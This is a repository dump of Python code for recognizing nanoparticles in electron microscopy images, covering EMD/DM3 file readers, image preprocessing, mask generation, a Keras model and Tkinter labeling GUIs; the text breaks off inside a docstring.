"alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "c93cb42871656542263c136a2cfcff9513a2fa3f", "content_id": "efe3c2596c11725331327a38dc9f59697ee7e1b8", "detected_licenses": [], 
2
ckgrosch/particleRecognition
https://github.com/ckgrosch/particleRecognition
87f127e812654c0cefd41aeb0a1a764abde77d8c
33b82563f35aba52fe783aa7957e9e9b37d18184
26ea40aaa5454c0582eb2fbfc2e44b2260569732
refs/heads/master
2018-10-22T05:19:38.061805
2018-08-24T00:31:20
2018-08-24T00:31:20
105,322,046
1
1
null
2017-09-29T22:24:02
2019-07-24T21:53:11
2020-02-24T18:02:49
Python
[ { "alpha_fraction": 0.4938505291938782, "alphanum_fraction": 0.4976348280906677, "avg_line_length": 35.211429595947266, "blob_id": "db6753490044fd4e802600aa578cc0939281eba3", "content_id": "818c641a83894af67fe7b806ed038fc0a8cdfd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12684, "license_type": "no_license", "max_line_length": 197, "num_lines": 350, "path": "/image_processing/ncempy/io/emd.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nThis module provides an interface to the EMD file format.\n\nSee https://emdatasets.com/ for more details.\n'''\n\nimport numpy as np\nimport h5py\nimport datetime\n\n\nclass fileEMD:\n '''Class to represent EMD files. \n \n Implemented for spec 0.2 using the recommended layout for metadata.\n \n Meant to provide convenience functions for commonly occuring tasks. This means that you will still want to acces fileEMD.file_hdl to manipulate the HDF5 file for not so commonly occuring tasks.\n \n Parameters:\n filename (str): Name of the EMD file.\n readonly (bool): Set to open in read only mode.\n \n '''\n \n def __init__(self, filename, readonly=False):\n '''Init opening/creating the file.\n \n '''\n \n ## necessary declarations in case something goes bad\n self.file_hdl = None\n \n # convenience handles to access the data in the emd file, everything can as well be accessed using the file_hdl\n self.version = None\n self.data = None\n self.microscope = None\n self.sample = None\n self.user = None\n self.comments = None\n self.list_emds = [] # list of HDF5 groups with emd_data_type type\n \n # check for string\n if not isinstance(filename, str):\n raise TypeError('Filename is supposed to be a string!')\n\n # try opening the file\n if readonly:\n try:\n self.file_hdl = h5py.File(filename, 'r')\n except:\n print('Error opening file for readonly: \"{}\"'.format(filename))\n raise\n else:\n try:\n self.file_hdl = h5py.File(filename, 'a')\n except:\n print('Error opening file for read/write: \"{}\"'.format(filename))\n raise\n \n \n # if we got a working file\n if self.file_hdl: \n \n # check version information\n if 'version_major' in self.file_hdl.attrs and 'version_minor' in self.file_hdl.attrs:\n # read version information\n self.version = (self.file_hdl.attrs['version_major'], self.file_hdl.attrs['version_minor'])\n # compare to implementation\n if not self.version == (0,2):\n print('WARNING: You are reading a version {}.{} EMD file, this implementation assumes version 0.2!'.format(self.version[0], self.version[1]))\n else:\n # set version information\n if not readonly:\n self.file_hdl.attrs['version_major'] = 0\n self.file_hdl.attrs['version_minor'] = 2\n \n # check for data group\n if not 'data' in self.file_hdl:\n if not readonly:\n self.data = self.file_hdl.create_group('data')\n else:\n self.data = self.file_hdl['data']\n \n # check for data group\n if not 'microscope' in self.file_hdl:\n if not readonly:\n self.microscope = self.file_hdl.create_group('microscope')\n else:\n self.microscope = self.file_hdl['microscope']\n \n # check for data group\n if not 'sample' in self.file_hdl:\n if not readonly:\n self.sample = self.file_hdl.create_group('sample')\n else:\n self.sample = self.file_hdl['sample']\n \n # check for data group\n if not 'user' in self.file_hdl:\n if not readonly:\n self.user = self.file_hdl.create_group('user')\n else:\n self.user = self.file_hdl['user']\n \n # check for data group\n if not 'comments' in self.file_hdl:\n if not 
readonly:\n self.comments = self.file_hdl.create_group('comments')\n else:\n self.comments = self.file_hdl['comments']\n \n # find emd_data_type groups in the file\n self.list_emds = self.find_emdgroups(self.file_hdl)\n \n\n def __del__(self):\n '''Destructor for EMD file object.\n \n '''\n \n # close the file\n if(self.file_hdl):\n self.file_hdl.close()\n\n\n def find_emdgroups(self, parent):\n '''Find all emd_data_type groups within the group parent and return a list of references to their HDF5 groups.\n \n Parameters:\n parent (h5py._hl.group.Group): Handle to the parent group.\n \n Returns:\n (list): A list of h5py._hl.group.Group handles to children groups being emd_data_type groups.\n \n '''\n \n emds = []\n \n # recursive function to run and retrieve groups with emd_group_type set to 1\n def proc_group(group, emds):\n # take a look at each item in the group\n for item in group:\n # check if group\n if group.get(item, getclass=True) == h5py._hl.group.Group:\n item = group.get(item)\n # check if emd_group_type\n if 'emd_group_type' in item.attrs:\n if item.attrs['emd_group_type'] == 1:\n emds.append(item)\n # process subgroups\n proc_group(item, emds)\n \n # run\n proc_group(parent, emds)\n \n return emds\n\n\n def get_emdgroup(self, group):\n '''Get the emdtype data saved in in group.\n \n Parameters:\n group (h5py._hl.group.Group): Reference to the emdtype HDF5 group.\n \n Returns:\n (tuple/None): None or tuple containing:\n \n np.ndarray: The data of the emdtype group.\n \n list: List of dimension vectors plus labels and units.\n \n '''\n \n # check input\n if not isinstance(group, h5py._hl.group.Group):\n raise TypeError('group needs to refer to a valid HDF5 group!')\n \n if not 'emd_group_type' in group.attrs:\n raise TypeError('group is not a emd_group_type group!')\n if not group.attrs['emd_group_type'] == 1:\n raise TypeError('group is not a emd_group_type group!')\n\n # retrieve data\n try:\n # get the data\n data = group['data'][:]\n \n # get the dims\n dims = []\n for i in range(len(data.shape)):\n dim = group['dim{}'.format(i+1)]\n # save them as (vector, name, units)\n \n if isinstance(dim.attrs['name'], np.ndarray):\n name = dim.attrs['name'][0]\n else:\n name = dim.attrs['name']\n \n if isinstance(dim.attrs['units'], np.ndarray):\n units = dim.attrs['units'][0]\n else:\n units = dim.attrs['units']\n \n dims.append( (dim[:], name.decode('utf-8'), units.decode('utf-8')) )\n \n dims = tuple(dims)\n \n return data, dims\n \n except:\n # if something goes wrong, return None\n print('Content of \"{}\" does not seem to be in emd specified shape'.format(group.name))\n \n return None\n \n\n def write_dim(self, label, dim, parent):\n '''Auxiliary function to write a dim dataset to parent.\n \n Input is not checked for sanity, so handle exceptions in call.\n \n Parameters:\n label (str): Label for dataset, usually dim1, dim2, dimN.\n dim (tuple): Tuple containing (data, name, units).\n parent (h5py._hl.group.Group): HDF5 handle to parent group.\n \n Returns:\n (h5py._hl.group.Group): HDF5 dataset handle referencing this dim.\n \n '''\n \n try:\n dset = parent.create_dataset(label, data=dim[0])\n dset.attrs['name'] = np.string_(dim[1])\n dset.attrs['units'] = np.string_(dim[2])\n except:\n raise RuntimeError('Error during writing dim dataset')\n \n return dset\n \n \n def put_emdgroup(self, label, data, dims, parent=None, overwrite=False):\n '''Put an emdtype dataset into the EMD file.\n \n Parameters:\n label (str): Label for the emdtype group containing the dataset.\n data 
(np.ndarray): Numpy array containing the data.\n dims (tuple): Tuple containing the necessary dims as ((vec, name, units), (vec, name, units), ...)\n parent (h5py._hl.group.Group/None): Parent for the emdtype group, if None it will be written to /data.\n overwrite (bool): Set to force overwriting entry in EMD file.\n \n Returns:\n (h5py._hl.group.Group/None): Group referencing this emdtype dataset or None if failed.\n \n '''\n \n # check input\n if not isinstance(label, str):\n raise TypeError('label needs to be string!')\n \n if not isinstance(data, np.ndarray):\n raise TypeError('data needs to be a numpy.ndarray!')\n \n try:\n assert len(dims) == len(data.shape)\n for i in range(len(dims)):\n assert len(dims[i]) == 3\n assert dims[i][0].shape[0] == data.shape[i]\n except:\n raise TypeError('Something wrong with the provided dims')\n \n # write stuff to HDF5\n \n # create group\n try:\n if parent:\n if label in parent:\n if overwrite:\n print('overwriting \"{}\" in \"{}\"'.format(label, parent.name))\n del parent[label]\n else:\n print('\"{}\" already exists in \"{}\"'.format(label, parent.name))\n raise RuntimeError('\"{}\" already exists in \"{}\"'.format(label, parent.name))\n grp = parent.create_group(label)\n \n else:\n if label in self.data:\n if overwrite:\n print('overwriting \"{}\" in \"{}\"'.format(label, self.data.name))\n del self.data[label]\n else:\n print('\"{}\" already exists in \"{}\"'.format(label, self.data.name))\n raise RuntimeError('\"{}\" already exists in \"{}\"'.format(label, self.data.name))\n\n grp = self.data.create_group(label)\n \n # add attribute\n grp.attrs['emd_group_type'] = 1\n \n # create dataset\n dset = grp.create_dataset('data', data=data)\n \n # create dim datasets\n for i in range(len(dims)):\n self.write_dim('dim{}'.format(i+1), dims[i], grp)\n \n # update emds list\n self.list_emds = self.find_emdgroups(self.file_hdl)\n \n return grp\n \n except:\n print('Something went wrong trying to write the dataset.')\n \n return None\n\n\n def put_comment(self, msg, timestamp=None):\n '''Create a comment in the EMD file.\n \n If timestamp already exists, the msg is appended to existing comment.\n \n Parameters:\n msg (str): String of the message to save.\n timestamp (str/None): Timestamp used as the key, defaults to the current UTC time.\n \n '''\n \n # check input\n if not isinstance(msg, str):\n raise TypeError('msg needs to be a string!')\n \n # create timestamp if missing\n if not timestamp:\n timestamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S (UTC)')\n else:\n # try to convert given timestamp to string\n try:\n timestamp = str(timestamp)\n except:\n raise\n \n # write comment\n if timestamp in self.comments.attrs:\n # append to existing\n self.comments.attrs[timestamp] += np.string_('\\n'+msg)\n \n else:\n # create new entry\n self.comments.attrs[timestamp] = np.string_(msg)\n \n\n" }, { "alpha_fraction": 0.5589113235473633, "alphanum_fraction": 0.5854257941246033, "avg_line_length": 39.67856979370117, "blob_id": "08d8ca888b581d4bbdfdb10db14e2cfabcfe6c11", "content_id": "91b122e1278870590220dfe878ffb730cacda574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5695, "license_type": "no_license", "max_line_length": 129, "num_lines": 140, "path": "/image_processing/timage_v3.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom 
matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\nfrom skimage import exposure\nfrom ast import literal_eval\nimport shutil\nfrom skimage import io\n\n#Image preprocessing scripts for CNN development\n\ndef xray_correct(image):\n    if type(image) is not np.ndarray:\n        raise TypeError('Input must be numpy ndarray.')\n    image[image<0] = 0\n    bad_loc = np.argwhere(image > ((image.mean()+1000)-image.std()))\n    for loc in bad_loc:\n        if loc[0]+1 > (image.shape[0]-1) or loc[0]-1 < 0 or loc[1]+1 > (image.shape[1]-1) or loc[1] - 1 < 0:\n            new_pixel_int = image.mean()+(image.std()*5)\n        else:\n            neighbor_sum = image[loc[0]-1,loc[1]] + image[loc[0]+1,loc[1]] + image[loc[0],loc[1]-1] + image[loc[0],loc[1]+1]\n            new_pixel_int = neighbor_sum /4\n        image[loc[0],loc[1]] = new_pixel_int\n    return image\n\ndef adjust_pipeline(directory_list):\n    i = 0\n    for directory in directory_list:\n        try:\n            os.mkdir(directory+'/adjustedPNG2')\n            new_directory = directory+'/adjustedPNG2'\n        except:\n            new_directory = directory+'/adjustedPNG2'\n        dm3s = glob(directory+ '/*.dm3')\n        for dm3 in dm3s:\n            img = dm.dmReader(dm3)['data']\n            if img.shape[0] < 1024:\n                pass\n            elif img.shape[0] == 2048 and img.shape[1] == 2048:\n                img = transform.resize(xray_correct(img),(1024,1024), anti_aliasing = True )\n                name = dm3.split('/')[-1].split('.')[0]\n                imsave(new_directory+'/'+name+'.png', img, format=\"png\", cmap=cm.gray)\n            elif img.shape[0] == 1024 and img.shape[1] == 1024:\n                name = dm3.split('/')[-1].split('.')[0]\n                imsave(new_directory+'/'+name+'.png', exposure.equalize_adapthist(xray_correct(img)), format=\"png\", cmap=cm.gray)\n        i += 1\n        print('{} / {} directories complete'.format(i,len(directory_list)))\n    print('done!')\n\ndef imm(image):\n    fig, ax = plt.subplots(figsize=(10,10))\n    ax.imshow(image, cmap = 'gray')\n    ax.axis('off')\n\ndef image_slice_small(directory):\n    \"\"\"used to break up the 1024x1024 images into 64x64 segments; takes a\n    directory that is the source\"\"\"\n    image_file_list = glob(directory+'/images/*.png')\n    image_new_directory = directory + '/small_sliced_images/'\n    if os.path.isdir(image_new_directory) != True:\n        os.mkdir(image_new_directory)\n    label_file_list = glob(directory+'/labels/*.png')\n    label_new_directory = directory + '/small_sliced_labels/'\n    if os.path.isdir(label_new_directory) != True:\n        os.mkdir(label_new_directory)\n    image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n    label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n    if len(image_name_list) != len(label_name_list):\n        raise RuntimeError('different number of images and labels')\n    if image_name_list != label_name_list:\n        raise RuntimeError('images and labels did not match')\n    for idx, file in enumerate(image_file_list):\n        image2split = io.imread(file, as_grey=True)\n        label2split = io.imread(label_file_list[idx], as_grey=True)\n        for x in range(0,15*64,64):\n            for y in range(0,15*64,64):\n                image = image2split[x:x+64,y:y+64]\n                label = label2split[x:x+64,y:y+64]\n                if np.any(np.isin([1],label)) == False:\n                    pass\n                else:\n                    image_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n                    label_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n                    plt.imsave(image_new_directory+image_name,image, cmap='gray')\n                    plt.imsave(label_new_directory+label_name,label, cmap='gray')\n    print('done!')\n\ndef txt_reader(file):\n    txt_info = open(file,'r')\n    txt = []\n    centers = []\n    radii = []\n    for line in txt_info:\n        if line == '\\n':\n            pass\n        else:\n            line = 
line.strip('\\n')\n txt.append(line)\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n for loc in txt[1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n image_size = literal_eval(txt[-1])\n return centers, radii, image_size\n\n\ndef spot_maker(location, radius, label_mask):\n for x in np.arange(location[0]-radius,location[0]+radius,1):\n for y in np.arange(location[1]-radius,location[1]+radius,1):\n dx = x - location[0]\n dy = y - location[1]\n if np.sqrt((dx**2+dy**2)) <= radius \\\n and int(x) < label_mask.shape[0] and int(y) < label_mask.shape[1]:\n label_mask[int(y),int(x)] = 1\n return label_mask\n\ndef mask_maker(file):\n centers, radii, image_size = txt_reader(file)\n label_mask = np.zeros(image_size)\n for idx,radius in enumerate(radii):\n label_mask = spot_maker(centers[idx],radius,label_mask)\n return label_mask\n\ndef mask_pipeline(directory):\n file_list = glob(directory+'/text_files/*.txt')\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, file in enumerate(file_list):\n if len(open(file,'r').readlines()) == 0:\n pass\n else:\n label_mask = mask_maker(file)\n plt.imsave(directory+'/labels/'+name_list[idx]+'.png',label_mask, cmap='gray')\n shutil.move(file,directory+'/old_text_files/')\n print('done!')\n" }, { "alpha_fraction": 0.61712247133255, "alphanum_fraction": 0.7039238810539246, "avg_line_length": 29.035715103149414, "blob_id": "4eb506a3d6d7e10ac1bebd938e8c5f9bff9b28be", "content_id": "c5a6cd5e51a5988d6ef320f94842ab3cd360dc44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 841, "license_type": "no_license", "max_line_length": 161, "num_lines": 28, "path": "/label_data_gui/testing_tkinter_window.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom PIL import Image, ImageTk\n\nwindow = Tk()\nwindow2 = Tk()\n\n#Key down functions\ndef click():\n circle_radius = textentry.get()\n\n#Put in photo\nimage = Image.open('/Users/kategroschner/Box Sync/Research/HR-TEM/20180227/20180227_101729F_prepped20171204/8bit/20180227_101729F_plasma15sec_Mh370kx__0012.tif')\nphoto = ImageTk.PhotoImage(image)\nlabel = Label(window, image = photo).grid(row = 0, column = 0,sticky = W)\n\n#Second window with menus\nlabel2 = Label(window2, text = \"Enter radius of circle:\", font = \"none 12 bold\")\\\n.grid(row = 0, column = 0, sticky = W)\ntextentry = Entry(window2,width = 20, bg = \"blue\")\ntextentry.grid(row = 1, column = 0, sticky = W)\nButton(window2, text = \"Submit\", width = 6, command = click).grid(row = 3, \\\ncolumn = 0, sticky = W)\n\n\n\n#run mainloop \nwindow.mainloop()\nwindow2.mainloop()\n" }, { "alpha_fraction": 0.7067209482192993, "alphanum_fraction": 0.7561099529266357, "avg_line_length": 48.099998474121094, "blob_id": "2ba7fd686c79d864d3d2f0755a61fee17ef1abd9", "content_id": "ddeb6df1a4473dac193a94ef25213088c848c4a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "no_license", "max_line_length": 177, "num_lines": 40, "path": "/classfier_builds/encoder3000.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom keras.models import Model\nfrom keras.layers import *\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras import backend as K\nfrom 
keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.losses import binary_crossentropy\nfrom keras import metrics\n\ntrainX = np.load('/global/scratch/cgroschner/trainSynthImages.npy')\ntrainY = np.load('/global/scratch/cgroschner/trainSynthMasks.npy')\ntestX = np.load('/global/scratch/cgroschner/testSynthImages.npy')\ntestY = np.load('/global/scratch/cgroschner/testSynthMasks.npy')\ntrainX = trainX.astype('float32')/trainX.max()\ntestX = testX.astype('float32')/testX.max()\ntrainY = np.squeeze(trainY,axis = 4)\ntestY = np.squeeze(testY,axis =4)\n\ninputs = Input((512,512,1))\nzeros = ZeroPadding2D(padding=(8, 8))(inputs)\nconv1 = Conv2D(64,(3,3),padding = 'valid', activation='relu')(zeros)\nconv2 = Conv2D(64,(3,3),padding = 'valid', activation = 'relu')(conv1)\npool1 = MaxPool2D((2,2),padding = 'valid',strides=2)(conv2)\nconv3 = Conv2D(128,(3,3), padding='valid',activation='relu')(pool1)\npool2 = MaxPool2D((2,2),padding='valid',strides = 2)(conv3)\nconv5 = Conv2D(256,(3,3),padding = 'valid',activation='relu')(pool2)\nup1 = UpSampling2D((2,2))(conv5)\nup2 = UpSampling2D((2,2))(up1)\nnorm1 = BatchNormalization()(up2)\nfinal = Conv2D(1,(1,1),activation='softmax')(norm1)\nmodel3 = Model(inputs=inputs,outputs=final)\n\nmodel3.compile(loss='binary_crossentropy', optimizer=Adam(lr=1e-4), metrics=['accuracy'])\ncallbacks_list = [EarlyStopping(monitor='val_acc',patience=1),ModelCheckpoint(filepath='/global/scratch/cgroschner/encoder3000train.h5',monitor ='val_acc', save_best_only=True)]\n\nmodel3.fit(trainX, trainY,batch_size=20,epochs=5,verbose=1,shuffle=True, callbacks=callbacks_list,validation_data=(testX,testY))\nmodel3.save('/global/scratch/cgroschner/encoder3000train.h5')\npredY = model3.predict(testX,batch_size=10,verbose=1)\nprint(metrics.binary_accuracy(testY, predY))\n" }, { "alpha_fraction": 0.7365319728851318, "alphanum_fraction": 0.7390572428703308, "avg_line_length": 25.977272033691406, "blob_id": "862c9d29f22095cbeb10b74355ce43ae", "content_id": "33ab00b870bcf514edd46de213cc7232365a1e94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 194, "num_lines": 44, "path": "/image_processing/ncempy/README.rst", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "------\nncempy\n------\n\nopenNCEM's python package.\n\nStructure\n---------\n\nThe package is given the following structure:\n\n* docs\n Documentation of the `ncempy` package.\n\n* algo\n Algorithms used for image processing and other computing. These act as the machinery of the provided tools. Heavy reuse is encouraged by keeping them general to the processing of datasets.\n\n* eval\n Evaluation routines built from the single algorithms in `algo`. These address specific tasks like evaluating the results from a particular method or experimental setup.\n\n* io\n Module to do file IO for various file formats. 
While the EMD file format is used internally, other file formats commonly used in electron microscopy are read in using importers.\n\n* test\n Unittests for all modules, functions, lines of code.\n\n\nRequirements\n------------\n\n``ncempy`` is designed and written for python3.5.\n\nIt relies on the following packages:\n* numpy\n* scipy\n* matplotlib (for plotting)\n* h5py (for EMD files)\n\nInstallation\n------------\n\nFor now we support pip installing the ``ncempy`` package from the gitHub repository:\n\n``pip install 'git+https://github.com/ercius/openNCEM.git@development#egg=ncempy'``\n\n" }, { "alpha_fraction": 0.6003291606903076, "alphanum_fraction": 0.6143190264701843, "avg_line_length": 33.88995361328125, "blob_id": "810867adb42b07dc9f349508b4f3654bba51782f", "content_id": "072f48cc575eea7ef92e318c8f2eb9142ec2f780", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7291, "license_type": "no_license", "max_line_length": 163, "num_lines": 209, "path": "/label_data_gui/particle_label_gui_v2.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# Basic Animation Framework\n\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\n\n\n####################################\n# customize these functions\n####################################\n\n# Adds shapes on mouse clicks and deletes them on pressing 'd'\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.newCircleCenter = [0,0]\n data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory() \n root.update() \n name = \".\"\n path = directory + \"/*.png\"\n print(path) \n files = []\n for fname in glob.glob(path):\n files.append(fname)\n \n return(files, path)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS UNLESS YOU CHANGE DEPENDECE OF OUTPUT\n photo = ImageTk.PhotoImage(image)\n return(photo)\n \ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n label_file.write(\"Particle Location:\\n\")\n for loc in data.recordCircleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n real_r = np.multiply(r,2) #because r is with respect to the 512x512 image not 1024x1024\n label_file.write(str(real_r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize: #so you can check that the original image was 1024x1024\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas):\n data.newCircleCenter = [event.x, event.y]\n recordCircleCenter = [canvas.canvasx(event.x)*2,canvas.canvasy(event.y)*2] #NOTE THE TIMES TWO\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.recordCircleCenters.pop()\n data.radii.pop()\n 
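# these four lists are parallel (one entry per circle), so they must be popped together to stay in sync\n            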
data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 0.5\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 0.5\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] -= 1\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] += 1\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] -= 1\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] += 1\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n data.photo = imageOpen(files,data)\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n if (event.char == \"q\"):\n quitGui(root)\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '16','bold'),text=data.labels[idx])\n \n\ndef quitGui(root):\n root.destroy()\n####################################\n# use the run function as-is\n####################################\n\ndef run(width=524, height=524):\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update() \n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data, canvas)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n \n \n \n # Set up data and call init\n class Struct(object): pass\n #initialize all the required data\n data = Struct()\n data.width = width\n data.height = height\n data.radius = 20\n data.fileCounter = 0\n init(data)\n \n #Run the file dialog\n int_root = Tk()\n files = getFiles(int_root)[0]\n print(files[0])\n int_root.mainloop()\n\n #run the main image labeling gui\n root = Tk()\n data.photo = 
imageOpen(files,data)\n    #get first image to label\n    #files = getFiles()\n    #image = Image.open(files[0])\n    #image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS\n    #photo = ImageTk.PhotoImage(image)\n\n    # create the root and the canvas\n    canvas = Canvas(width=data.width, height=data.height)\n    canvas.create_image(0,0,image = data.photo, anchor = \"nw\")\n    canvas.pack()\n    # set up events\n    root.bind(\"<Button-1>\", lambda event:\n            mousePressedWrapper(event, canvas, data))\n    root.bind(\"<Key>\", lambda event:\n            keyPressedWrapper(event, canvas, data,files,root))\n    redrawAll(canvas, data)\n    # and launch the app\n\n    root.mainloop() # blocks until window is closed\n    print(\"bye!\")\n    print(data.recordCircleCenters,data.radii, data.labels)\n\nrun(524, 524)" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 24.33333396911621, "blob_id": "f05c8a9bfe95938fa8ca68e34b28cf026cb390e0", "content_id": "e43f22e30660c5440579b50457218d46439a2894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 52, "num_lines": 3, "path": "/README.md", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# particleRecognition\n\n- Contains all the work for identifying quantum dots\n" }, { "alpha_fraction": 0.5691424012184143, "alphanum_fraction": 0.5837994813919067, "avg_line_length": 42.157630920410156, "blob_id": "143f08acccc1ae42c2c12c7f4acb82941fee0c8c", "content_id": "599ceb37f5a7181b3f665409f79b163916415dc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33431, "license_type": "no_license", "max_line_length": 213, "num_lines": 793, "path": "/image_processing/interplot.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# from ncempy.io import dm\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom matplotlib.widgets import Slider, Button, RadioButtons\nimport ipywidgets as widgets\n\ndef interplot(image):\n    \"\"\"Plots images represented as numpy arrays with a slider bar to control the range of the image's histogram\"\"\"\n    if type(image) != np.ndarray:\n        raise RuntimeError('Input must be np.ndarray')\n    slider_range = [image.min(),image.max()]\n    def imm(image, irange):\n        fig, ax = plt.subplots(figsize=(10,10))\n        ax.imshow(image, cmap = 'gray', clim = irange)\n        ax.axis('off')\n    def slide(x):\n        imm(image,x)\n    x = widgets.IntRangeSlider(value = slider_range,min = slider_range[0],max = slider_range[1],continuous_update = False)\n    widgets.interact(slide,x=x)\n\n\ndef open_dm3(dm3FileList, imageNum):\n    image = dmReader(dm3FileList[imageNum])\n    print(dm3FileList[imageNum])\n    return image['data']\n\n\"\"\"\nA module to load data and meta data from DM3 and DM4 files into python.\n\nOn Memory mode:\n    The fileDM class supports an \"on memory\" mode that preloads the file data in memory\nand data read operations during data parsing are performed against memory. 
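Preloading means the parser issues its many small reads and seeks against RAM rather than the file system. 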
